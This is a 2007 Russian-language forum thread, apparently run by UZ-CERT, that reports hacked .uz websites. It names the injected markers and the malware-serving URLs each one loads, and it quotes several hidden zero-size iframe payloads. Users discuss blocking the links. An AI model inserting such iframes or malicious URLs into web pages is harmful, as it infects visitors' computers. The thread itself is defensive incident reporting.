uForum.uz

uForum.uz (https://uforum.uz/index.php)
-   UZ-CERT (https://uforum.uz/forumdisplay.php?f=494)
-   -   Лента: УГРОЗЫ НА САЙТАХ .UZ (https://uforum.uz/showthread.php?t=2562)

Eldar Ishimbaev 19.09.2007 15:08

Лента: УГРОЗЫ НА САЙТАХ .UZ
 
Уважаемые пользователи!

В связи с участившимися случаями внедрения вредоносного кода на веб-сайты доменной зоны .UZ решено открыть данный тред, в котором мы будем публиковать названия зараженных сайтов, которые могут предоставлять угрозу и инфицировать пользовательские рабочие станции вирусами и троянами.

По устранению угрозы на сайте мы будем давать анонс о безопасности ресурса.

Если вы самостоятельно обнаружите какой-либо инфицированный сайт, то просим вас сообщить нам об этом по этой ссылке.

Dmitry Paleev 19.09.2007 15:29

На веб-сайте hттp://www.me.uz были обнаружены сразу две ссылки, загружающие вредоносное ПО на компьютер пользователя.

Первая вредоносная ссылка:

[HTML]<html><iframe src=http://oya.ru/vyhod/numizmat/ima/ frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe></html>[/HTML]

Вторая вредоносная ссылка:

[HTML]<iframe src="http://zlo-x.net/XDS/iframe.php" width=0 height=0 border=0></iframe>[/HTML]

Просим с осторожностью заходить на указанный веб-сайт до решения проблемы и заблокировать вредоносные ссылки в своих межсетевых экранах.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 20.09.2007 14:33

www.arksugurta.uz
 
На веб-сайте hттp://www.arksugurta.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->
После расшифровки кода (а зашифрован он аж 4 раза) получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 20.09.2007 14:42

www.elgroup.uz
 
На веб-сайте hттp://www.elgroup.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 7 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 20.09.2007 14:46

www.innovation.uz
 
На веб-сайте hттp://www.innovation.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 2 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 20.09.2007 14:50

www.iptv.uz
 
На веб-сайте hттp://www.iptv.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в одном месте файла index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 20.09.2007 15:38

roller.sarkor.uz
 
На веб-сайте hттp://roller.sarkor.uz были обнаружены 2 вредоносные ссылки.

Первая ссылка:

Код:

<iframe src="http://lilohost.hk/cgi/index.php" width="0" height="0"></iframe>
Вторая ссылка:

Код:

<iframe name=857699b070 src='http://alltraff.ru/lol.php?1003893b72477f' width=761 height=186 style='display: none'></iframe>
Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

Dmitry Paleev 20.09.2007 15:50

www.versal.uz
 
На веб-сайте hттp://www.versal.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 3 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 20.09.2007 15:55

www.asus.uz
 
На веб-сайте hттp://www.asus.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 1 месте в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 20.09.2007 15:59

www.glob.uz
 
На веб-сайте hттp://www.glob.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 9 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 20.09.2007 16:15

www.baik.uz
 
На веб-сайте hттp://www.baik.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!-- ~ --> вредоносный код <!-- ~ -->

Внедрен он в 3 местах в файле index.

Вредоносная ссылка: http://www.ragil.com/bannerstand/head03.htm
Далее, идет переадресация сюда: http://ianburke.com/ex/index.php

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 20.09.2007 17:04

mingbulak.connect.uz
 
На веб-сайте hттp://mingbulak.connect.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[O]--><script>document.write вредоносный код <!--[/O]-->

Внедрен он в 2 местах в файле index.

Вредоносная ссылка: hттp://www.dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

Dmitry Paleev 20.09.2007 17:18

tashkent.sarkor.uz
 
На веб-сайте hттp://tashkent.sarkor.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[O]--><script>document.write вредоносный код <!--[/O]-->

Внедрен он в одном месте в файле index.

Вредоносная ссылка: hттp://www.dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

Dmitry Paleev 20.09.2007 17:21

www.alutex.uz
 
На веб-сайте hттp://www.alutex.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!-- ~ --> вредоносный код <!-- ~ -->

Внедрен он в одном месте в файле index.

Вредоносная ссылка: hттp://www.kiote.info/ip/index.php

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Eldar Ishimbaev 21.09.2007 11:48

Информация изменена. Проверьте посты заново.

По мере наших сил попытаемся информировать ежедневно.

Dmitry Paleev 21.09.2007 14:00

www.flowershop.uz
 
На веб-сайте hттp://www.flowershop.uz был обнаружен код, загружающий на компьютер вредоносное ПО.

Код находится между тегами <!-- start get_javascript вредоносная ссылка <!-- end get_javascript(applicationtop2header) //-->

Внедрен он в одном месте в файле index.

Вредоносная ссылка: hттp://977398530/?2954196ea44dc2a0

А также: hттp://malasha.com и hттp://977398531/s

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 21.09.2007 18:09

www.admiral.uz
 
На веб-сайте hттp://www.admiral.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[O]--><script>document.write вредоносный код <!--[/O]-->

Внедрен он в 2 местах в файле index.

Вредоносная ссылка: hттp://www.dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

Dmitry Paleev 21.09.2007 18:20

www.al-aziz.uz
 
На веб-сайте hттp://www.al-aziz.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <iframe src вредоносный код </iframe>

Внедрен он в одном месте в файле index.

Вредоносная ссылка: http://coolsite.ho.com.ua/_XDS_TDS_1.2/iframe.php

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 21.09.2007 18:55

www.asg.uz
 
На веб-сайте hттp://www.asg.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <iframe> вредоносный код </iframe>

Внедрен он в 5 местах в файле index.

Вредоносная ссылка: http://my-loads.info/ip/index.php

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

Dmitry Paleev 22.09.2007 12:39

www.newmax.uz
 
На веб-сайте hттp://www.newmax.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <iframe> вредоносный код </iframe>

Внедрен он в одном месте в файле index.

Вредоносная ссылка: http://www.alaqiq.net/quran/stata/index.php

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 22.09.2007 12:41

www.podarki.uz
 
На веб-сайте hттp://www.podarki.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <iframe> вредоносный код </iframe>

Внедрен он в одном месте в файле index.

Вредоносная ссылка: http://www.alaqiq.net/quran/stata/index.php

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 22.09.2007 13:50

www.realvid.uz
 
На веб-сайте hттp://www.realvid.uz были обнаружены 2 кода, загружающие на компьютер вредоносное ПО.

Первый код находится между тегами <!-- ~ --><iframe вредоносный код </iframe><!-- ~ -->

Второй код находится между тегами <!-- o65 --><iframe вредоносный код </iframe><!-- c65 -->

Внедрен он в 2 местах в файле index.

Первая вредоносная ссылка: http://mdfc.info
Вторая вредоносная ссылка: http://volkoeb.info/xd/go.php

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 22.09.2007 14:11

www.parfumgallery.uz
 
На веб-сайте hттp://www.parfumgallery.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[O]--> вредоносный код <!--[/O]-->

Внедрен он в 2 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 22.09.2007 14:19

www.noni.uz
 
На веб-сайте hттp://www.noni.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!-- ~ --> вредоносный код <!-- ~ -->

Внедрен он в 4 местах в файле index.

Вредоносная ссылка: http://www.pozhary.net/images/znaki/check.php

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 22.09.2007 14:43

www.minzdr.uz
 
На веб-сайте hттp://www.minzdr.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!-- ~ --> вредоносный код <!-- ~ -->

Внедрен он в одном месте в файле index.

Вредоносная ссылка: hттp://1com.ws/cool/index.php

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 22.09.2007 14:48

www.mikrokreditbank.uz
 
На веб-сайте hттp://www.mikrokreditbank.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[O]--> вредоносный код <!--[/O]-->

Внедрен он в 4 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

Dmitry Paleev 22.09.2007 15:02

www.kmn.uz
 
На веб-сайте hттp://www.kmn.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в одном месте в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

Dmitry Paleev 22.09.2007 15:08

www.keetas.uz
 
На веб-сайте hттp://www.keetas.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в одном месте в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 22.09.2007 15:10

www.kamini.uz
 
На веб-сайте hттp://www.kamini.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[O]--> вредоносный код <!--[/O]-->

Внедрен он в 2 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 22.09.2007 15:16

www.irmoq.uz
 
На веб-сайте hттp://www.irmoq.uz был обнаружен код, загружающий на компьютер вредоносное ПО.

Код находится между тегами <!-- ~ --> вредоносный код <!-- ~ -->

Внедрен он в 2 местах в файле index.

Вредоносная ссылка: http://carsauto.org/exp.htm

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 22.09.2007 15:21

www.intek.uz
 
На веб-сайте hттp://www.intek.uz был обнаружен код, загружающий на компьютер вредоносное ПО.

Код находится между тегами <iframe> вредоносный код </iframe>

Внедрен он в одном месте в файле index.

Вредоносная ссылка: http://0xcb.0xdf.0x9e.0x0c/t

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

Dmitry Paleev 22.09.2007 15:25

www.in.uz
 
На веб-сайте hттp://www.in.uz был обнаружен код, загружающий на компьютер вредоносное ПО.

Код находится между тегами <iframe> вредоносный код </iframe>

Внедрен он в одном месте в файле index.

Вредоносная ссылка: http://md5f1h.msk.ru/ice/index.php

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

Dmitry Paleev 22.09.2007 15:32

www.immunology.uz
 
На веб-сайте hттp://www.immunology.uz был обнаружен код, загружающий на компьютер вредоносное ПО.

Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в одном месте в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 22.09.2007 15:49

www.filesearch.uz
 
На веб-сайте hттp://www.filesearch.uz был обнаружен код, загружающий на компьютер вредоносное ПО.

Код находится между тегами <iframe> вредоносный код </iframe>

Внедрен он в одном месте в файле index.

Вредоносная ссылка: http://zoob.rxfly.net

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Djalolatdin Rakhimov 22.09.2007 15:51

и какие же способы защиты? или только отслеживать посты в данной теме? да и не запомнишь всех сайтов?

Djalolatdin Rakhimov 22.09.2007 15:53

Цитата:

Сообщение от Dmitry Paleev (Сообщение 40021)
Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

или же рассылать провайдерам, чтобы они комплексно блокировали такие ссылки для своих клиентов, переводя ссылку на страницу с описанием проблемы, мол зараженная страница? нормальный сервис

Daniyar Atadjanov 22.09.2007 15:54

Цитата:

Сообщение от Djalolatdin Rakhimov (Сообщение 40023)
или же рассылать провайдерам

ДЖ, провайдеров держим в копии.

Djalolatdin Rakhimov 22.09.2007 16:37

Цитата:

Сообщение от Daniyar Atadjanov (Сообщение 40024)
ДЖ, провайдеров держим в копии.

уверен, они ничего не делают, кроме прочтения сообщения :(

Dmitry Paleev 22.09.2007 16:39

Цитата:

Сообщение от Djalolatdin Rakhimov (Сообщение 40022)
и какие же способы защиты? или только отслеживать посты в данной теме? да и не запомнишь всех сайтов?

Ответ:

Цитата:

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

Eldar Ishimbaev 22.09.2007 16:40

Цитата:

Сообщение от Djalolatdin Rakhimov (Сообщение 40032)
уверен, они ничего не делают, кроме прочтения сообщения

Было бы хорошо блокировать ещё до провайдеров.


Текущее время: 14:51. Часовой пояс GMT +5.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd. Перевод: zCarot
OOO «Единый интегратор UZINFOCOM»